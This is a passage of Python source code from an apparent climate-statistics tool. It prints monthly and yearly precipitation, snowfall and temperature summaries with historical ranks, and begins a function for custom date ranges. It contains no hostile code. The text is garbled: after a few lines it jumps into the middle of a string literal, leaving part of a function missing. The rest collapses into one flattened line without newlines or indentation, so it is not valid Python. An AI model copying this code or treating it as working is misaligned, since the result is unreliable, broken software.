        for x in metclmt[y][season]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tminPROP"]["day_max"][1][len(metclmt[y][season]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr))
    if metclmt[y][season]["tminPROP"]["day_min"][0] != -999:
        print(" -- Coolest Daily TMIN: {}".format(metclmt[y][season]["tminPROP"]["day_min"][0]),end = " ::: ")
        for x in metclmt[y][season]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tminPROP"]["day_min"][1][len(metclmt[y][season]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr))
    print("-----")
Run the clmtAnalyze function first.") if y not in metclmt: return print("* A record for {} not found in metclmt *".format(y)) prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = metYearRank("temps",5,yearStatsRun=True) try: snwdDAYSdeschist = sorted(set(list(metclmt[YR]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR]["snwdDAYS"] != 0)),reverse=True) snwdDAYSaschist = sorted(set(list(metclmt[YR]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR]["recordqty"] > excludeyear))) except Exception as e: print(e) print("") print("{:^73}".format("Statistics for Meteorological Year {}".format(y))) print("{:^73}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^73}".format("Quantity of Records: {}".format(clmt[y]["recordqty"]))) if metclmt[y]["recordqty"] <= excludeyear: print("{:-^73}".format("")) print("*** MET. 
YEAR STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("{:-^73}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|".format("","MAR {}".format(y),"APR {}".format(y),"MAY {}".format(y),"JUN {}".format(y),"JUL {}".format(y),"AUG {}".format(y))) print("{:-^73}".format("")) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "PRCP", "{:.2f}".format(round(sum(metclmt[y][3]["prcp"]),2)) if 3 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][4]["prcp"]),2)) if 4 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][5]["prcp"]),2)) if 5 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][6]["prcp"]),2)) if 6 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][7]["prcp"]),2)) if 7 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][8]["prcp"]),2)) if 8 in metclmt[y] else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "SNOW", "{:.1f}".format(round(sum(metclmt[y][3]["snow"]),1)) if 3 in metclmt[y] and (sum(metclmt[y][3]["snow"]) > 0 or metclmt[y][3]["snowDAYS"] > 0) else (" -- " if 3 in metclmt[y] and sum(metclmt[y][3]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][4]["snow"]),1)) if 4 in metclmt[y] and (sum(metclmt[y][4]["snow"]) > 0 or metclmt[y][4]["snowDAYS"] > 0) else (" -- " if 4 in metclmt[y] and sum(metclmt[y][4]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][5]["snow"]),1)) if 5 in metclmt[y] and (sum(metclmt[y][5]["snow"]) > 0 or metclmt[y][5]["snowDAYS"] > 0) else (" -- " if 5 in metclmt[y] and sum(metclmt[y][5]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][6]["snow"]),1)) if 6 in metclmt[y] and (sum(metclmt[y][6]["snow"]) > 0 or metclmt[y][6]["snowDAYS"] > 0) else (" -- " if 6 in metclmt[y] and sum(metclmt[y][6]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][7]["snow"]),1)) if 7 in metclmt[y] and (sum(metclmt[y][7]["snow"]) > 0 or metclmt[y][7]["snowDAYS"] > 0) else (" -- " if 7 in metclmt[y] and 
sum(metclmt[y][7]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][8]["snow"]),1)) if 8 in metclmt[y] and (sum(metclmt[y][8]["snow"]) > 0 or metclmt[y][8]["snowDAYS"] > 0) else (" -- " if 8 in metclmt[y] and sum(metclmt[y][8]["snow"]) == 0 else ""), )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TAVG", "{:.1f}".format(round(mean(metclmt[y][3]["tempAVGlist"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tempAVGlist"]),1)) if 4 in metclmt[y] and len(metclmt[y][4]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tempAVGlist"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tempAVGlist"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tempAVGlist"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tempAVGlist"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMAX", "{:.1f}".format(round(mean(metclmt[y][3]["tmax"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tmax"]),1)) if 4 in metclmt[y] and len(metclmt[y][4]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tmax"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tmax"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tmax"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tmax"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tmax"]) > 1 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMIN", 
"{:.1f}".format(round(mean(metclmt[y][3]["tmin"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tmin"]),1)) if 4 in metclmt[y] and len(metclmt[y][4]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tmin"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tmin"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tmin"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tmin"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tmin"]) > 1 else "", )) print("{:-^73}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|".format("","SEP {}".format(y),"OCT {}".format(y),"NOV {}".format(y),"DEC {}".format(y),"JAN {}".format(y+1),"FEB {}".format(y+1))) print("{:-^73}".format("")) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "PRCP", "{:.2f}".format(round(sum(metclmt[y][9]["prcp"]),2)) if 9 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][10]["prcp"]),2)) if 10 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][11]["prcp"]),2)) if 11 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][12]["prcp"]),2)) if 12 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][1]["prcp"]),2)) if 1 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][2]["prcp"]),2)) if 2 in metclmt[y] else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "SNOW", "{:.1f}".format(round(sum(metclmt[y][9]["snow"]),1)) if 9 in metclmt[y] and (sum(metclmt[y][9]["snow"]) > 0 or metclmt[y][9]["snowDAYS"] > 0) else (" -- " if 9 in metclmt[y] and sum(metclmt[y][9]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][10]["snow"]),1)) if 10 in metclmt[y] and (sum(metclmt[y][10]["snow"]) > 0 or metclmt[y][10]["snowDAYS"] > 0) else (" -- " if 10 in metclmt[y] and 
sum(metclmt[y][10]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][11]["snow"]),1)) if 11 in metclmt[y] and (sum(metclmt[y][11]["snow"]) > 0 or metclmt[y][11]["snowDAYS"] > 0) else (" -- " if 11 in metclmt[y] and sum(metclmt[y][11]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][12]["snow"]),1)) if 12 in metclmt[y] and (sum(metclmt[y][12]["snow"]) > 0 or metclmt[y][12]["snowDAYS"] > 0) else (" -- " if 12 in metclmt[y] and sum(metclmt[y][12]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][1]["snow"]),1)) if 1 in metclmt[y] and (sum(metclmt[y][1]["snow"]) > 0 or metclmt[y][1]["snowDAYS"] > 0) else (" -- " if 1 in metclmt[y] and sum(metclmt[y][1]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][2]["snow"]),1)) if 2 in metclmt[y] and (sum(metclmt[y][2]["snow"]) > 0 or metclmt[y][2]["snowDAYS"] > 0) else (" -- " if 2 in metclmt[y] and sum(metclmt[y][2]["snow"]) == 0 else ""), )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TAVG", "{:.1f}".format(round(mean(metclmt[y][9]["tempAVGlist"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][10]["tempAVGlist"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tempAVGlist"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tempAVGlist"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tempAVGlist"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tempAVGlist"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMAX", "{:.1f}".format(round(mean(metclmt[y][9]["tmax"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tmax"]) > 1 else "", 
"{:.1f}".format(round(mean(metclmt[y][10]["tmax"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tmax"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tmax"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tmax"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tmax"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tmax"]) > 1 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMIN", "{:.1f}".format(round(mean(metclmt[y][9]["tmin"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][10]["tmin"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tmin"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tmin"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tmin"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tmin"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tmin"]) > 1 else "", )) print("{:-^73}".format("")) print(" Total Precipitation: {}".format(round(sum(metclmt[y]["prcp"]),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2))+1)),end="") if sum(metclmt[y]["prcp"]) > 0 and prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2)) <= prcpaschist.index(round(sum(metclmt[y]["prcp"]),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(metclmt[y]["prcp"]),2))+1))) if 
metclmt[y]["recordqty"] > excludeyear and prcpaschist.index(round(sum(metclmt[y]["prcp"]),2)) <= prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(metclmt[y]["prcpDAYS"]),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"])+1)),end="") if metclmt[y]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"]) <= prcpDAYSaschist.index(metclmt[y]["prcpDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(metclmt[y]["prcpDAYS"])+1))) if prcpDAYSaschist.index(metclmt[y]["prcpDAYS"]) <= prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"]) else print("") except: print("") if round(sum(metclmt[y]["prcp"]),2) > 0: print(" -- Highest Daily Precip: {}".format(metclmt[y]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["prcpPROP"]["day_max"][1][len(metclmt[y]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow: {}".format(round(sum(metclmt[y]["snow"]),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y]["snow"]),1))+1)),end="") if sum(metclmt[y]["snow"]) > 0 and snowdeschist.index(round(sum(metclmt[y]["snow"]),1)) <= snowaschist.index(round(sum(metclmt[y]["snow"]),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y]["snow"]),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(metclmt[y]["snow"]),1))+1))) if metclmt[y]["recordqty"] > excludeyear and snowaschist.index(round(sum(metclmt[y]["snow"]),1)) <= snowdeschist.index(round(sum(metclmt[y]["snow"]),1)) else print("") except: print("") print(" Total Snow Days (>=T): 
{}".format(metclmt[y]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y]["snowDAYS"])+1)),end="") if metclmt[y]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y]["snowDAYS"])+1))) if metclmt[y]["recordqty"] > excludeyear and snowDAYSaschist.index(metclmt[y]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y]["snowDAYS"]) else print("") except: print("") if metclmt[y]["snwdDAYS"] > 0: print(" Total Days w/Snow on the Ground (>=T): {}".format(metclmt[y]["snwdDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"])+1)),end="") if metclmt[y]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"]) <= snwdDAYSaschist.index(metclmt[y]["snwdDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(metclmt[y]["snwdDAYS"])+1))) if metclmt[y]["recordqty"] > excludeyear and snwdDAYSaschist.index(metclmt[y]["snwdDAYS"]) <= snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"]) else print("") except: print("") if round(sum(metclmt[y]["snwd"]),1) > 0: print(" -- Highest Daily Snow-Depth: {}".format(metclmt[y]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["snwdPROP"]["day_max"][1][len(metclmt[y]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print(" Average Temperature: {}".format(round(mean(metclmt[y]["tempAVGlist"]),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1))+1)),end="") if 
len(metclmt[y]["tempAVGlist"]) > excludeyear*2 and tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1))+1))) if len(metclmt[y]["tempAVGlist"]) > excludeyear*2 and tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(metclmt[y]["tmax"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1))+1)),end="") if len(metclmt[y]["tmax"]) > excludeyear and tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1)) <= tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1))+1))) if len(metclmt[y]["tmax"]) > excludeyear and tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1)) <= tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1)) else print("") except: print(" Avg MAX Temperature: N/A") if metclmt[y]["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(metclmt[y]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tmaxPROP"]["day_max"][1][len(metclmt[y]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y]["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(metclmt[y]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tmaxPROP"]["day_min"][1][len(metclmt[y]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) try: print(" Avg MIN Temperature: 
{}".format(round(mean(metclmt[y]["tmin"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(metclmt[y]["tmin"]),1))+1)),end="") if len(metclmt[y]["tmin"]) > excludeyear and tmindeschist.index(round(mean(metclmt[y]["tmin"]),1)) <= tminaschist.index(round(mean(metclmt[y]["tmin"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(metclmt[y]["tmin"]),1))+1))) if len(metclmt[y]["tmin"]) > excludeyear and tminaschist.index(round(mean(metclmt[y]["tmin"]),1)) <= tmindeschist.index(round(mean(metclmt[y]["tmin"]),1)) else print("") except: print(" Avg MIN Temperature: N/A") if metclmt[y]["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(metclmt[y]["tminPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tminPROP"]["day_max"][1][len(metclmt[y]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y]["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(metclmt[y]["tminPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tminPROP"]["day_min"][1][len(metclmt[y]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) if all(len(x) == 0 for x in [metclmt[y]["tempAVGlist"],metclmt[y]["tmax"],metclmt[y]["tmin"]]): print("*** No Reliable Temperature Data for {} {}".format(calendar.month_abbr,y)) print("-----") def customStats(y1,m1,d1,*date2): """Report on a custom-length period of recorded statistics. All passed arguments MUST be integers. If the optional ending arguments are not included, the default ending will be December 31 of the calendar year, given by Y1; does not accept values of greater than a year customStats(Y1,M1,D1,*[Y2,M2,D2]) REQUIRED: Y1,M1,D1 --> Represent the beginning year, month, and date of the custom period. 
OPT *args: Y2,M2,D2 --> These optional entries represent the ending year, month, and date of the period EXAMPLE: customStats(1999,8,12) -> Returns a printout of statistics from August 12th, 1999 to December 31, 1999. """ if any(type(x) != int for x in [y1,m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***") valid1 = checkDate(y1,m1,d1) if len(date2) == 0: pass elif len(date2) != 3: return print("*** OOPS! For the 2nd (optional) date, ensure a Year, Month and Date are entered ***") else: if any(type(x) != int for x in [date2[0],date2[1],date2[2]]): return print("*** OOPS! Ensure that only integers are entered ***") valid2 = checkDate(date2[0],date2[1],date2[2]) startday = datetime.date(y1,m1,d1) incr_day = startday if len(date2) == 3: endday = datetime.date(date2[0],date2[1],date2[2]) else: emo = max(M for M in clmt[startday.year] if type(M) == int) edy = max(D for D in clmt[startday.year][emo] if type(D) == int) endday = datetime.date(startday.year,emo,edy) if endday <= startday: return print("*** OOPS! Pick an earlier start-day or (if applicable) a later end-day ***") # This handles if the passed time is greater than a year if endday >= datetime.date(startday.year+1,startday.month,startday.day): if endday == datetime.date(startday.year+1,startday.month,startday.day): endday = datetime.date(startday.year+1,startday.month,startday.day)-datetime.timedelta(days=1) else: return print("*** OOPS! 
customStats only accepts a temporal scope of a year or less") c_prcp = [] c_prcpDAYS = 0 c_snow = [] c_snowDAYS = 0 c_snwd = [] c_snwdDAYS = 0 c_temp = [] c_tmax = [] c_tmin = [] records_in_period = 0 c_records = {"prcpPROP":{"day_max":[-1,[]]}, "snowPROP":{"day_max":[-1,[]]}, "snwdPROP":{"day_max":[-1,[]]}, "tempPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} # Determine total length of period (used for exclusion calculation) s = datetime.date(1900,startday.month,startday.day) test = datetime.date(1900,endday.month,endday.day) if test > s: e = test else: e = datetime.date(1901,endday.month,endday.day) timelength = (e - s).days + 1 if timelength <= 5: EXCLD = timelength-1 elif timelength == 6: EXCLD = 4 elif timelength == 7: EXCLD = excludeweek elif timelength == 8: EXCLD = excludeweek elif timelength in [28,29,30,31]: EXCLD = excludemonth elif timelength >= 350: EXCLD = excludeyear else: EXCLD = round(excludecustom * timelength) while incr_day <= endday: y = incr_day.year; m = incr_day.month; d = incr_day.day if y in clmt and m in clmt[y] and d in clmt[y][m]: # If a record for clmt[y][m][d] exists records_in_period += 1 if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: c_prcp.append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == c_records["prcpPROP"]["day_max"][0]: c_records["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > c_records["prcpPROP"]["day_max"][0]: c_records["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) c_records["prcpPROP"]["day_max"][1] = [] c_records["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""] and float(clmt[y][m][d].prcp) != 0 or clmt[y][m][d].prcpM == "T": c_prcpDAYS += 1 if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in 
["9999","-9999",""]: c_snow.append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),2) == c_records["snowPROP"]["day_max"][0]: c_records["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),2) > c_records["snowPROP"]["day_max"][0]: c_records["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),2) c_records["snowPROP"]["day_max"][1] = [] c_records["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""] and float(clmt[y][m][d].snow) != 0 or clmt[y][m][d].snowM == "T": c_snowDAYS += 1 if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: c_snwd.append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == c_records["snwdPROP"]["day_max"][0]: c_records["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if round(float(clmt[y][m][d].snwd),1) > c_records["snwdPROP"]["day_max"][0]: c_records["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) c_records["snwdPROP"]["day_max"][1] = [clmt[y][m][d]] if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": c_snwdDAYS += 1 if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tmin not in ["9999","-9999",""]: c_temp.append(int(clmt[y][m][d].tmax)) c_temp.append(int(clmt[y][m][d].tmin)) if round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) == c_records["tempPROP"]["day_max"][0]: c_records["tempPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) > c_records["tempPROP"]["day_max"][0]: c_records["tempPROP"]["day_max"][0] = round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) c_records["tempPROP"]["day_max"][1] = [] c_records["tempPROP"]["day_max"][1].append(clmt[y][m][d]) if 
round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) == c_records["tempPROP"]["day_min"][0]: c_records["tempPROP"]["day_min"][1].append(clmt[y][m][d]) elif round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) < c_records["tempPROP"]["day_min"][0]: c_records["tempPROP"]["day_min"][0] = round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) c_records["tempPROP"]["day_min"][1] = [] c_records["tempPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: c_tmax.append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == c_records["tmaxPROP"]["day_max"][0]: c_records["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > c_records["tmaxPROP"]["day_max"][0]: c_records["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) c_records["tmaxPROP"]["day_max"][1] = [] c_records["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == c_records["tmaxPROP"]["day_min"][0]: c_records["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < c_records["tmaxPROP"]["day_min"][0]: c_records["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) c_records["tmaxPROP"]["day_min"][1] = [] c_records["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: c_tmin.append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == c_records["tminPROP"]["day_max"][0]: c_records["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > 